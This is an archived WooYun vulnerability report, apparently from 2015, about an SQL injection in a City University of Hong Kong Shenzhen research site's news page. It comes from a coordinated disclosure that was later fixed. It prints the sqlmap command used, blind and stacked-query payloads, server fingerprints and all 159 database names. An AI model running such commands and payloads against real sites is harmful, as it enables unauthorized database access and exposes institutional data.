当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152580

漏洞标题:香港城市大學某分站存在SQL插入攻擊(159個庫)(香港地區)

相关厂商:香港城市大學

漏洞作者: 路人甲

提交时间:2015-11-10 23:47

修复时间:2015-12-16 10:02

公开时间:2015-12-16 10:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态: 已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-10: 细节已通知厂商并且等待厂商处理中
2015-11-20: 厂商已经确认,细节仅向厂商公开
2015-11-30: 细节向核心白帽子及相关领域专家公开
2015-12-10: 细节向普通白帽子公开
2015-12-16: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

香港城市大學(城大)乃亞太區首屈壹指的高等學府,憑借其卓越研究及專業教學, 城大在Quacquarelli Symonds (QS) 發表的2014年度建校未滿五十年的首五十所大學排名榜位列第四名,根據QS 2014年度亞洲大學排名榜,城大為亞洲第十壹位。
香港城市大學深圳研究院(研究院) 乃城大在國內的延伸,於2001年由城大全資撥款設立,肩負著同壹使命 ─ 培育引領世界潮流的創新人才,及推動社會經濟快速發展。
自香港城市大學產學研大樓於2011年落成以來,研究院的發展壹日千裏,研發中心的數目已增至11所,另有2所專業實驗室,2所國家重點實驗室,2所深圳市重點實驗室,及面積超過1,500平方米的高科技企業培訓設施,多年來承擔了超過100項國家、省市及香港的科研項目,如國家973及863計劃、國家自然科學基金委員會專項基金項目、廣東省科技重點攻關項目、組建深圳市重點實驗室、深港創新圈計劃、深圳市各項科技計劃以及香港創新科技計劃等。其多項研發成果更獲得深港兩地政府的支持及獎項,其中包括香港工商業科技成就大獎、深圳市科技創新大獎和深圳雙百計劃等。
2008年7月5日,時任國家副主席的習近平率領代表團在深圳考察粵港合作期間專程視察了研究院屬下的生物醫藥科技中心,城大的科研實力在此可見壹斑。
隨著國家第十二個五年規劃倡議的中港深化合作,研究院將有更大的發展空間和更重要的角色扮演。

详细说明:

地址:http://**.**.**.**/sri/htm/news_show.asp?id=110

python sqlmap.py -u "http://**.**.**.**/sri/htm/news_show.asp?id=110" -p id --technique=BS --random-agent --batch --current-user --is-dba --dbs

漏洞证明:

---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=110 AND 4268=4268
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: id=110;WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
current user: 'sri'
current user is DBA: False
database management system users [2]:
[*] sa
[*] sri
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=110 AND 4268=4268
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: id=110;WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
available databases [159]:
[*] [cc-ctu]
[*] [cc-image]
[*] [cc-vod]
[*] [en-intern]
[*] [en-lcp-bst]
[*] [en-lcp-fb]
[*] [en-lcp-fse]
[*] [en-lcp-scm]
[*] [en-lcp-slw]
[*] [en-lcp-sr]
[*] [en-lcp]
[*] aadbapp
[*] acarl
[*] admo
[*] adr
[*] ah
[*] ais
[*] ais2
[*] apdb
[*] aro
[*] arro
[*] arro_db
[*] bch_cheng
[*] bchdb
[*] bchdb2
[*] bshxwen
[*] bst_info_bank
[*] caio
[*] caio_cms
[*] caio_intern
[*] campusvr
[*] cap_alumni
[*] cash
[*] cc_ctu_awa
[*] cc_ctu_hl
[*] cc_duty
[*] cc_sms
[*] cc_sql_log
[*] cccshung
[*] ccic
[*] ccmatthew
[*] ccr
[*] cctest
[*] cepie
[*] class
[*] col
[*] com
[*] com_prlab
[*] comdb2
[*] con_archive
[*] convocation
[*] copsre
[*] cosdaf
[*] csc
[*] csc_log
[*] cse
[*] csidb
[*] csie
[*] ctl
[*] cttfs
[*] ctu_anniv
[*] ctuoncities
[*] cturecruit
[*] cuo
[*] DAOClassnote
[*] demo
[*] dfest
[*] do
[*] dss
[*] dssidb
[*] ecard
[*] edo
[*] edolcc
[*] edoltl
[*] edosi
[*] edotuc
[*] elc
[*] elco
[*] elearn
[*] emalias
[*] en
[*] foadmin
[*] fse
[*] fse_office
[*] fym
[*] garc
[*] ge2012conf
[*] ge_advise
[*] ges
[*] greencon
[*] hitcount
[*] innov
[*] isurvey
[*] kto
[*] kto_acc
[*] ls
[*] ma
[*] master
[*] meao
[*] merc
[*] mes
[*] minerals
[*] model
[*] msdb
[*] obtl
[*] onehealth
[*] orien
[*] orien15
[*] oss
[*] palsi
[*] par
[*] pol_seemark
[*] portal
[*] projectcare
[*] projectflame
[*] psearch
[*] pudbapp
[*] pumreg
[*] puo
[*] qclf
[*] qualtrics
[*] rcms
[*] sa_flame
[*] sa_w6
[*] said
[*] scm
[*] sds_cls
[*] sds_ebms
[*] sds_inday
[*] sds_sch
[*] sds_sfa
[*] searc
[*] searc2
[*] see
[*] seem_gie
[*] ses
[*] sles
[*] slw
[*] sps
[*] sri
[*] sro
[*] sro_10th
[*] srvldrship
[*] ss
[*] ss_care
[*] ss_cfepe2015
[*] ss_posed
[*] stfintra
[*] sussummit
[*] sustainability
[*] svm
[*] tea
[*] tempdb
[*] tinyurl
[*] tlq
[*] tto
[*] userpanel
[*] vislit
[*] wayfinder

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-11-20 16:09

厂商回复:

已將漏洞報告給網站聯絡人

最新状态:

2015-12-16:相關機構回報已修復漏洞